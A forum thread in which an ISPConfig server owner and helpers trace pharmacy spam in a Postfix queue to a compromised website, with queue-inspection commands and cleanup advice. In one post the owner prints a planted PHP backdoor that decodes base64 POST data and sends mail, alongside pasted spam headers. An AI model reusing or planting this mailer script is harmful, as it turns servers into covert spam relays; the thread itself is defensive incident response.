Hello my postfix queue gets filled with spam mails. Unfortunately my ISPConfig lets the SPAM through. How do I find which e-mail address is compromized or what can I do to fix the problem? ISPConfig latest version 3.2.7p1 PHP 7.4 Kind regards Chistian
Read the e-mails to see which account is sending them. My signature has link to e-mail setup tutorial with Troubleshooting tips. Then change the passwords of that account. Try to figure out how account got compromised and what more needs to be done.
Many thanks Taleman for your quick answer! I found the address is [email protected]. This address even did not exist. Now I added a forward with this address to an existing account. Is my dovecot configuration wrong that it lets mails trough even without an account?
When you see emails from webmaster@ in your mailqueue, then this normally means that one of your websites got hacked, the website domain.com. You can most likely find more details on which script in your hacked website is sending the spam by checking the mail headers of one of the spam emails using postcat command. Get a message ID of one of the mails using: postqueue .p and then review the headers of it with: postcat -q MSGID where MSGID needs to be replaced with the message ID of the message you want to view. In the headers, you'll probably find the name of the hacked PHP script that sends the emails.
Many Thanks Till! Unfortunately the domain is the main domain running ISPConfig. The headers don't show any hint to a script: -- 250 Kbytes in 437 Requests. sun:~# postcat -q A63206B82D3D *** ENVELOPE RECORDS maildrop/A63206B82D3D *** message_arrival_time: Fri Dec 17 09:44:48 2021 named_attribute: rewrite_context=local sender_fullname: sender: webmaster @ rothmedia.net *** MESSAGE CONTENTS maildrop/A63206B82D3D *** To: pdhens @ yahoo.com Subject: sup Maya! Date: Fri, 17 Dec 2021 10:44:33 +0200 Message-ID: <[email protected]> Return-Path: <[email protected]> From: Mariah Ci a lis Soft 20mg de a ler <[email protected]> Reply-to: Mariah Ci a lis Soft 20mg de a ler <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit works http:// mmedc.edu.mm /ivette_furtrell. html Maya Sigua *** HEADER EXTRACTED maildrop/A63206B82D3D *** recipient: pdhens @ yahoo.com *** MESSAGE FILE END maildrop/A63206B82D3D *** sun:~# postcat -q 469E96B82D47 *** ENVELOPE RECORDS maildrop/469E96B82D47 *** message_arrival_time: Fri Dec 17 09:44:51 2021 named_attribute: rewrite_context=local sender_fullname: sender: webmaster @ rothmedia.net *** MESSAGE CONTENTS maildrop/469E96B82D47 *** To: captdivine @ aol. com Subject: hiya Dani! Date: Fri, 17 Dec 2021 10:44:36 +0200 Message-ID: <5457b159d519cdcf30f09b17ade23fdd @dot.state. nh.us> Return-Path: <21l ynelle @dot.state. nh.us> From: Grace Ci a lis 20mg ret a iler <21lynelle @ dot.state.nh. us> Reply-to: Grace Ci a lis 20mg ret a iler <21lynelle @ dot.state.nh. us> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit mill http:// sandhu.codebucketitsolutions. com/shirlee_ knoeringer. html Dani Heede *** HEADER EXTRACTED maildrop/469E96B82D47 *** recipient: capt divine @aol. com *** MESSAGE FILE END maildrop/469E96B82D47 ***
ISPprotect might find the malware code added to that website. https://ispprotect.com/ Mailqueue may be full of messages, save a few messages for later examination and remove the rest from the queue. If all have same sender for example pfdel works to remove them. A few links https://www.ustrem.org/en/articles/postfix-queue-delete-en/ https://gist.github.com/gionn/3084076 I do not know where official pfdel repo is.
Search your mail logs for the same message I'd you see in the mail queue and you might get some more clues, eg. maybe the local user which submitted the message. You might be able to correlate the time messages are sent with a cron jobs or with website requests via logs (and be sure to manually check all cron jobs).
At the moment I let Postfix run from time to time and start it manually after deleting all messages with the sender webmaster @ rothmedia.net in the queue. I'm doing this with the following command: postqueue -p | tail -n +2 | awk 'BEGIN { RS = "" } /webmaster@rothmedia\.net/ {print $1 }' | tr -d '*!' | sudo postsuper -d - I get a lot of "Undelivered Mail Returned to Sender" messages, because of the deleted messages. Looking into them I can't identify any X-PHP-Originating-Script. Also when looking at the messages with postcat -q <msg-ID> The cron jobs from the root user are looking okay, no additional cron job who is sending mails. Looking into /var/www/rothmedia.net/web/ I have found many .php files e.g. yNKLFEsn.php The content of each file is: <?php foreach($_POST as $key => $x_value) { $data = base64_decode($x_value) ; $to_data = explode('|', $data); $to = $to_data[0]; $x_subject = $to_data[1]; $x_body = $to_data[2]; $from_user = $to_data[3]; $from_email = $to_data[4]; $header = $to_data[5]; $jfnbrsjfq = mail($to, $x_subject, $x_body, $header); if($jfnbrsjfq){echo 'error 403';} else {echo 'error 404 : ' . $jfnbrsjfq;} exit; } echo '###ERROR 404'; There is also a wp-admin folder with lot of .txt files e.g. 'ZXZlbnRzLnJvdGhtZWRpYS5uZXQ=.txt'. The content is the same in each file: LmZ1cm5pdHVyZWVuZ2luZWVyaW5nLnh5eg==|MTAwMC5mdXJuaXR1cmVlbmdpbmVlcmluZy54eXo= I think this are my scripts sending the mails. My question now. How comes that there is a wp-admin folder? Does ISPConfig need a wordpress installation in its web root? Can I delete everything under the web folder exept the folders stats, error and assets?
It seems that s.o. has installed a whole wordpress onto my server. I checked the wp-config.php and the database is a server IP somewhere. I could try to log into this db on that remote host and delete it. Well my question now is, how could s.o. gain access to my sever and install a wordpress instance? Even the domain rothmedia.net is redirected to another domain. I guess that with the deletion of the wordpress stuff in a few hours also this redirection is deleted. What is wondering me is the matter that in the web directory there is a directory called . And it is not the one . and .. which are listed via ls -l. No, it shows up with the dot like marked in a green block. Its permissions are drwxrwxrwx. I can't access it.
If root can not access it, check with command lsattr if it is protected with file attributes. Man pages lsattr and chattr explain more. You need to find answer to that question to prevent this happening again. Changing all passwords related to that website is one thing you should do. Examine file time stamps, what is the oldest on these files installed by cracker? Then examine all log files at that time. What about cron jobs of other users? Those php files you found are mail sending scripts, but they must be started somehow. Wordpress and other CMS tend to have security issues unless updated to latest version. Maybe cracker just installed Wordpress and cracks into your system repeatedly through worpdress to install one of those files and starts the script? Check logs to maybe see these happening. Try what happens with Code: echo "LmZ1cm5pdHVyZWVuZ2luZWVyaW5nLnh5eg==" | base64 --decode Where did this redirection happen? If in .htaccess file, unless that .htaccess is removed or repaired redirection continues.
